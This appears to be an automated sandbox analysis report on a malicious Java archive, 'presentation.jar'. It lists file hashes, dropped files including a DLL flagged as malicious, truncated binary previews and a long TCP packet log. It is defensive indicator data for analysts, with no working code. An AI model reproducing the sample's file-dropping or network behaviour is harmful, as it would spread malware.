Preview:	var setupJET=function(){var e=SCSRenderAPI,t=e.getThemeUrlPrefix(),n={paths:{omniture:t+"/assets/js/s_code_remote",i18n:t+"/assets/js/dependencies/i18n.min",nls:t+"/assets/translations",installed:t+"/assets/js/installed.min",uninstall:t+"/assets/js/uninstallapplet.min"},config:{i18n:{locale:e.getPageLanguageCode()?e.getPageLanguageCode():"en"}}};requirejs.config(n);var a=document.createElement("script");a.async="async",a.type="text/javascript",a.crossOrigin="crossOrigin",a.src="//consent.trustarc.com/notice?domain=oracle.com&c=teconsent&js=bb&noticeType=bb&text=true&gtm=1&language="+(e.getPageLanguageCode()?e.getPageLanguageCode():"en"),$("head").append(a),(-1<window.location.host.indexOf("prodapp")\|\|-1<window.location.host.indexOf("localhost"))&&fixRelativeLinksStatic(),$(".spsidebar li a[href='"+SCSRenderAPI.getPageLinkUrl(SCS.navigationCurr)+"']").css("font-weight","bold")},START_RENDERING_EVENT="scsrenderstart";document.addEventListener?document.addEventListener(START_RENDERING_EVE

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\theme.deferred.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	8914
Entropy (8bit):	5.089447215809406
Encrypted:	false
SSDEEP:	192:FZavoubOycmVUmbDT5bD4DfAxsAl0Qlgso9QIA2DW8WsY/ADDOmIB:FZcSo14zAxsAlYQIA2qvig
MD5:	B6F0D719BC1F8A0DD143AF681743B4AE
SHA1:	E18AD9837E2EDE4185E63CB781FAF2D231C2DFEF
SHA-256:	E189CC46493B57DE1D751B6554AFDA0A641BAEF1F1A43C7DEF19921A0DBA054F
SHA-512:	14B0B05E65F01C5C6EF8AA491DBBABBF889FFB2B49E3A629A3FC37E34296FC8A00E916C337A4288A9C19FF8F987EFD4C36EEB5084AE13F3ECEF965D078F5D86B
Malicious:	false
IE Cache URL:	https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.deferred.min.js
Preview:	var debugF = 0 <= location.search.indexOf("debug");..function debug(e) {. debugF && console.log(e).}..function openPopup(e, n, i, o, t, a, d, r, s, w, f) {. popup = window.open(e, n, "width=" + i + ",height=" + o + ",resizable=" + t + ",scrollbars=" + a + ",menubar=" + d + ",toolbar=" + r + ",location=" + s + ",directories=" + w + ",status=" + f), popup.focus().}..function getParameterByName(e) {. var n = window.location.search;. e = e.replace(/[\[\]]/g, "\\$&");. var i = new RegExp("[?&]" + e + "(=([^&#]*)\|&\|#\|$)").exec(n);. return i ? i[2] ? decodeURIComponent(i[2].replace(/\+/g, " ")) : "" : null.}..function processRules(e, n) {. var i = ["equals", "contains", "greaterthan", "lessthan"],. o = ["contains", "equals"];. debug("Got envData"), debug(n), debug("Got Rules"), debug(e);. for (var t = 0; t < e.rules.length; t++) {. var a = e.rules[t];. debug("Checking Rule"), debug(a);. var d = !1;. if ("true" === a.default) return a;. for (var r = !0, s = 0; s < a.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\trustarc-logo-small[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 198 x 34, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4197
Entropy (8bit):	7.949279468766667
Encrypted:	false
SSDEEP:	96:cf2qaUvpL7qZRfYj76vPQ77VizJQyAcP7/IEPGD83nJ7rW0F1u2:cvtWRy76XQ7HFcPEvDOJ2n2
MD5:	01E1B7108FA9F6B54F403309A1616588
SHA1:	E3328418159B7371B64A6CFF199B2812C4D0B9C1
SHA-256:	91C4A6C4295F8889E8B04339A4A2C2E86D5EEF71BA808164E641D0D8A6435004
SHA-512:	EC6E3C4220F6675023674AAFEE3BF13C330028E7AB33333B757294575AD4002E890D7E7FDEE35D94E6388C2472413AFF2CB5B0A9B21CD0E19D0577A7B530BBA2
Malicious:	false
IE Cache URL:	https://consent-pref.trustarc.com/images/trustarc-logo-small.png
Preview:	.PNG........IHDR......."......N......sRGB.........IDATx..\.x.E...........V......!..+..DI....Q..Z%.......uU.]5.b.(B.uQ....P.C%.`""..@...z..K^..Q.N..........D^.4.i....O...<.x..4.i.....p...v...,..L")...H.W.h)i.UH.")ZI![..$A...>..U>....W.............1fU......A.!.%..R..S...#.h7.t....'.#4....K.&.,=d{..i..h..cp.G.8.EY.....Ak..^....q.6..\..XFI..n.;\h..4P.4P.1.7^]...}..Z...v.M..Z....@..%O.....9.f..JK.\| ...c.#..o..^.E..].!...#GF5h.@N.>..Nt..v...3.".v.,..2.~H.i..#..s..$.1..]GG,&g..A./h.=........B.3<..i`.a....6...o....M..&.8...s.=.!.F!...U01...i.v.t.,.e....Q..O..o..<...&..).c......~.....7V..U=....P.1...n<....\|].e.d.C..~.\.f...Y.d.(.4.S#....u5.mkN.d.o.....Q.P.$$$\.....~...9sr...rFyy9O.N.4.@...y.y..].v.mM+...,.....il.......\|.o...R7=...........!...V@.../11q.pl.GKeh...l.r...).U..}Q..PG...?I'...e.j......P\|.`w.......~..A..0...y...._....Q.p....@..<x..s.f.H.l[...y3.j..gz.\|.C..."....$77w..-.S..ftt.}...{.....t.5.<y...cV.m\R...<...s.]7.*;9.......p..}..q...T..!

C:\Users\user\AppData\Local\Temp\~DF398DC74F291C2548.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29745
Entropy (8bit):	0.2920107282763179
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAC9laAC9lrz:kBqoxxJhHWSVSEabeQ2y
MD5:	CE909A43525B3843C907DCBE55E9D7DD
SHA1:	8B6E53CCBAAB132FF8100ECB696282F011402047
SHA-256:	540A8B39EAF1EF9CF341697FC4CDABBEBDED17B16321398C539639FD17EE1602
SHA-512:	027F1DF5288441E3BFF63ABABD90521E2A72DC20FFAC545E0F180483761229D13254375ADA525D3C5155C1BAC6602117B24617A160C4B9D21C30721B9DF17446
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF497FA32C57F4517E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13077
Entropy (8bit):	0.5021412829471236
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9locF9loc9lWs5RzWSkvkQvi:kBqoI3Rs59VWHi
MD5:	202425240AA782BFE9CEE388DC728E84
SHA1:	62E43D3BBC782CE4AD1CA01DAA3DCB13F5B0ABF3
SHA-256:	88353A0E910730A187CF1D33532F82DEF63727A5AF6EDC9AA2FCBBBC242785A8
SHA-512:	58DCD0D944955A6905C446312316CA362EAD29ACB184A137D666CEB12D3C018BB554F2F3EFDC7E90F9332950F66EAB428CE26C7ACB6AA62B4A1B92BB03447181
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9F66EA97E71930AD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	131562
Entropy (8bit):	2.9552530496639755
Encrypted:	false
SSDEEP:	384:kBqoxKEppiRJLZUn7j6gxmU9AHWFzDpFmAPpR1EXYR1V6XwR1uLSZfPnzZTZ1Zq6:umU9A2Fz9nnLqWKwrsYrf
MD5:	D5D4BC2F45476C446B68BE0E42967E53
SHA1:	39EBC3EBC5BDAC249AA621AFB8D4702933623F33
SHA-256:	29BDCEBCED9397FFF278DE2473F05B311A1545479EB830B4D8DA4FECCE84B1D5
SHA-512:	182C60FDDB53E9EBA0412E589286E3E1F5F18F5E803DAF200621D558E241117FD81FA8D212653B6425557098BD4855760FB6D34F19E2B162ED94AEAF25C95F01
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\broker.dll Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	499712
Entropy (8bit):	6.2016592723723285
Encrypted:	false
SSDEEP:	6144:ZtuOlnq3kHzR1XyrOA5/NeQCJkGg5Q8eb2n1J3M5ScnH7dzVxWmuk:3ln/yrPXeXJk55mSn1FM5Syqmu
MD5:	AABA239E1C2208A6F00BB10034CBA621
SHA1:	2520815CDA4B4CDF652DE337D4C9285E74D2A585
SHA-256:	59767B2AC03EB8320A661F410D53A025C8975B12DE796E80B1C84306200F6A75
SHA-512:	1C80F3FF51F5D9B53232A1D9FB10C02BF22D8FBD686B76B8C6718B11BF6E834CA5B02C19535F70CBC08ADE26360D0B42C5B944D63516853FB84ACC573614AD16
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 9%, Browse Antivirus: ReversingLabs, Detection: 28%
Joe Sandbox View:	Filename: presentation.jar, Detection: malicious, Browse Filename: presentation.jar, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H....................................................Z..........q...................................Rich............................PE..L....ct`...........!.....0...........=.......@......................................................................p...\.......d..............................., ...B..............................`...@............@...............................text....!.......0.................. ..`.rdata.......@.......@..............@..@.data...0.... ...@... ..............@....rsrc................`..............@..@.reloc...-.......0...p..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
File Type:	data
Category:	dropped
Size (bytes):	45
Entropy (8bit):	0.9111711733157262
Encrypted:	false
SSDEEP:	3:/lwlt7n:WNn
MD5:	C8366AE350E7019AEFC9D1E6E6A498C6
SHA1:	5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
SHA-256:	11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
SHA-512:	33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
Malicious:	false
Preview:	........................................J2SE.

Static File Info

General
File type:	Java archive data (JAR)
Entropy (8bit):	7.8997767742025085
TrID:	Java Archive (13504/1) 62.80% ZIP compressed archive (8000/1) 37.20%
File name:	presentation.jar
File size:	6813
MD5:	6c5e7908c3a06aafd6dcebc8a2dcb674
SHA1:	d094aef9d24e13ab70f2ef767242be554ed855ae
SHA256:	cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
SHA512:	ea44242147e5c9589c56741059f7a7d6f64062ded254d697c06f754fa688bed0c9b5b79e9feac75d5569f560043ab01d88e427c4318a39c03768527686d53acb
SSDEEP:	192:kF+PVnWW4811rRBBTaikn27xcCQgcN0w7tLIdtZU1elD:kF+PV8811TBTaj27KCy0wmseD
File Content Preview:	PK........]..R................Secure_Viewer.class.....Vi[.W.~..'.#KTT.E.jP U...]p......hq..8.2.dB.Z..{]Z......>.............N.$.m?.=....s.Yn........._\|..............._....?.8%....d\.qQ.%..e\|,...Wd\|.3....B.U._.A.>...<!.C@..'.t.....)..V..1..+X.f.-..)(.n.%

File Icon


Icon Hash:	d28c8e8ea2868ad6

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 6, 2021 17:58:10.505778074 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.506170988 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.548083067 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.548495054 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.548835039 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.548938036 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.549284935 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.549583912 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.559942007 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.560168982 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.567368031 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.567519903 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.591331005 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591345072 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591562986 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591578960 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591603041 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591620922 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591639996 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591655016 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.591692924 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.591784954 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.593436003 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.593450069 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.593487978 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.593506098 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.593568087 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.593568087 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.593669891 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.605093956 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.605273962 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.605405092 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.605555058 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.607528925 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.608552933 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.646162033 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.646187067 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.646244049 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.646269083 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.646797895 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.646933079 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.648885965 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.648902893 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.648988962 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.649034023 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.649075031 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.649535894 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.649548054 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.649620056 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.655194998 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.655277967 CEST	49723	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.690535069 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.690558910 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.690587044 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.690602064 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.690634012 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.690671921 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.691198111 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.691232920 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.691270113 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.691313982 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.691320896 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.692439079 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.692459106 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.692542076 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.692859888 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.693504095 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.696080923 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.696099997 CEST	443	49723	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.698290110 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.700112104 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.719671011 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.739185095 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.742567062 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.743051052 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.743081093 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.743174076 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.743727922 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.743752956 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.743877888 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.743897915 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.744817972 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.744847059 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.745582104 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.745908022 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.745934963 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.746383905 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.747031927 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.747051954 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.747095108 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.747123003 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.748162031 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.748183966 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.748253107 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.749257088 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.749275923 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.749335051 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.750365973 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.750386000 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.750530958 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.751449108 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.751471043 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.751533985 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.751555920 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.760549068 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.760952950 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.760966063 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.761044979 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.767847061 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.767910004 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:10.768014908 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.768053055 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:10.955243111 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:11.016565084 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.016659021 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.025923967 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:11.026014090 CEST	443	49722	143.204.209.41	192.168.2.3
May 6, 2021 17:58:11.026082993 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:11.026093960 CEST	49722	443	192.168.2.3	143.204.209.41
May 6, 2021 17:58:11.057605028 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.057625055 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.057722092 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.057914019 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.058538914 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.058644056 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.070333958 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.071325064 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.072392941 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.072483063 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.099400043 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099486113 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099576950 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099597931 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099617004 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099659920 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.099689960 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.099752903 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099773884 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099791050 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.099813938 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.099922895 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.101504087 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.101525068 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.101572990 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.101586103 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.101600885 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.101651907 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.105901957 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.106117010 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.118122101 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.118498087 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.118515015 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.146971941 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.146997929 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.147090912 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.147095919 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.147119045 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.147177935 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.147243977 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.147283077 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.147315025 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.147370100 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.159445047 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.159463882 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.159475088 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.159487009 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.159547091 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.159646988 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.160631895 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.160654068 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.160706043 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.160794020 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.161053896 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.161117077 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.162131071 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.162750006 CEST	49729	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.203048944 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.203622103 CEST	443	49729	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.227174044 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.248523951 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.268057108 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.289594889 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.290050983 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.290075064 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.290298939 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.290332079 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.290594101 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.290657043 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.295648098 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.295738935 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.295756102 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.295800924 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.295840025 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.296510935 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.297182083 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.324667931 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.341778040 CEST	49731	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.341799974 CEST	49732	443	192.168.2.3	143.204.209.88
May 6, 2021 17:58:11.368423939 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.368448973 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.368515015 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.368963003 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.368988037 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.369046926 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.370074034 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.370100975 CEST	443	49728	143.204.209.31	192.168.2.3
May 6, 2021 17:58:11.370157957 CEST	49728	443	192.168.2.3	143.204.209.31
May 6, 2021 17:58:11.371165991 CEST	443	49728	143.204.209.31	192.168.2.3
